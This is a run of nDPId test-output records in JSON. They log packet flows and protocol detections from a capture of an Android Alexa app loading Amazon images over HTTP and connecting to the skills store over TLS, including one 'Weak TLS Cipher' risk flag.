-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2043,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxLyFCLFnmK3JKAScSD4HAAAAgQFtAQCCAps+n3SAPZytgEDAwg="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2044,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxNJprFn0NKXyaAScSAI+QAAAgQFtAQCCAps+nOsAPZytgEDAwg="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_packet_id":3,"flow_last_seen":1490976134200,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134200,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0vDFAAEAGNB6sECrYNFQ\/OMsVAFCK3c6HwtatV4AQAVc6+AAAAQEICgD2crts+npU"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134148,"flow_last_seen":1490976134200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71pwMKDRQIL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 
PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2047,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":1490976134201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134201,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0TQdAAEAGo0isECrYNFQ\/OMsUAFAHRT+xsJsTXoAQAVf3QwAAAQEICgD2crxs+nys"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2048,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_packet_id":3,"flow_last_seen":1490976134202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134202,"pkt":"AMDKkaPvePiC0\/vCCABFAAA02IxAAEAGF8OsECrYNFQ\/OMsRAFDDaqo\/vffTz4AQAVcBnwAAAQEICgD2crxs+n3S"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2049,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_packet_id":3,"flow_last_seen":1490976134202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134202,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0xZZAAEAGKrmsECrYNFQ\/OMsSAFCeYrck8hQixoAQAVeWrQAAAQEICgD2crxs+n3S"} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2050,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1490976134202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134202,"pkt":"AMDKkaPvePiC0\/vCCABFAAA05X9AAEAGCtCsECrYNFQ\/OMsTAFDQ0pfJSaaxaIAQAVeniQAAAQEICgD2crxs+nOs"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2051,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134146,"flow_last_seen":1490976134203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61oBTb+jZvL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2052,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134140,"flow_last_seen":1490976134203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/51woiL9kgkL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2053,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134141,"flow_last_seen":1490976134203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/81diFQyVjHL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 
Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2054,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134144,"flow_last_seen":1490976134204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134204,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71GcCNTb6kL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2055,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_packet_id":2,"flow_last_seen":1490976134237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134237,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxaJEqCkMupghaAScSCurAAAAgQFtAQCCAps+nR5APZytgEDAwg="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2056,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_packet_id":3,"flow_last_seen":1490976134238,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976134238,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0EjNAAEAG3hysECrYNFQ\/OMsWAFAy6mCFiRKgpYAQAVdNOgAAAQEICgD2cr9s+nR5"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2057,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134149,"flow_last_seen":1490976134239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976134239,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/612xlaOI2NL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2236,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976136930,"flow_last_seen":1490976136930,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976136930,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2236,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1490976136930,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976136930,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8bqFAAEAGoEasECrYNu8d\/Z+nAbuZbx1qAAAAAKAC\/\/9PLQAAAgQFtAQCCAoA9nPLAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2237,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_packet_id":2,"flow_last_seen":1490976137042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976137042,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwrQVAAOcGuu027x39rBAq2AG7n6dEArKimW8da3ASH\/7pVAAAAgQFtAEDAwY="} 
-00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2238,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_packet_id":3,"flow_last_seen":1490976137043,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976137043,"pkt":"AMDKkaPvePiC0\/vCCABFAAAobqJAAEAGoFmsECrYNu8d\/Z+nAbuZbx1rRAKyo1AQAVczxgAA"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2239,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976136930,"flow_last_seen":1490976137044,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976137044,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2241,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976136930,"flow_last_seen":1490976137222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976137222,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2274,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139642,"flow_last_seen":1490976139642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139642,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2274,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1490976139642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139642,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ooBAAEAGTcesECrYNFQ\/OMsYAFAytNZaAAAAAKAC\/\/+zQgAAAgQFtAQCCAoA9nTaAAAAAAEDAwg="} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2275,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2275,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA82RlAAEAGFy6sECrYNFQ\/OMsZAFDfya3CAAAAAKAC\/\/8uwwAAAgQFtAQCCAoA9nTbAAAAAAEDAwg="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2276,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2276,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ao9AAEAGhbisECrYNFQ\/OMsaAFCdOh5UAAAAAKAC\/\/8AwAAAAgQFtAQCCAoA9nTbAAAAAAEDAwg="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2277,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2277,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ziFAAEAGIiasECrYNFQ\/OMsbAFAzpLr6AAAAAKAC\/\/\/NrgAAAgQFtAQCCAoA9nTbAAAAAAEDAwg="} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2278,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2278,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8c6xAAEAGfJusECrYNFQ\/OMscAFApFQd3AAAAAKAC\/\/+LwAAAAgQFtAQCCAoA9nTbAAAAAAEDAwg="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8MrZAAEAGvZGsECrYNFQ\/OMsdAFCU10ZqAAAAAKAC\/\/\/hCAAAAgQFtAQCCAoA9nTcAAAAAAEDAwg="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2280,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_packet_id":2,"flow_last_seen":1490976139667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139667,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxh7572AMrTWW6AScSAgygAAAgQFtAQCCAps+nrkAPZ02gEDAwg="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2281,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_packet_id":3,"flow_last_seen":1490976139669,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139669,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0ooFAAEAGTc6sECrYNFQ\/OMsYAFAytNZbe+e9gYAQAVe\/XAAAAQEICgD2dN5s+nrk"} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139642,"flow_last_seen":1490976139669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71nqwmwmRlL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2283,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxrjsd\/DnToeVaAScSDohQAAAgQFtAQCCAps+naYAPZ02wEDAwg="} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxtRO\/n\/M6S6+6AScSAtRgAAAgQFtAQCCAps+ncBAPZ02wEDAwg="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2285,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxlSuJ7038mtw6AScSDlMAAAAgQFtAQCCAps+nm5APZ02wEDAwg="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2286,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_packet_id":2,"flow_last_seen":1490976139674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139674,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxx\/FDN0KRUHeKAScSCFPAAAAgQFtAQCCAps+nXPAPZ02wEDAwg="} 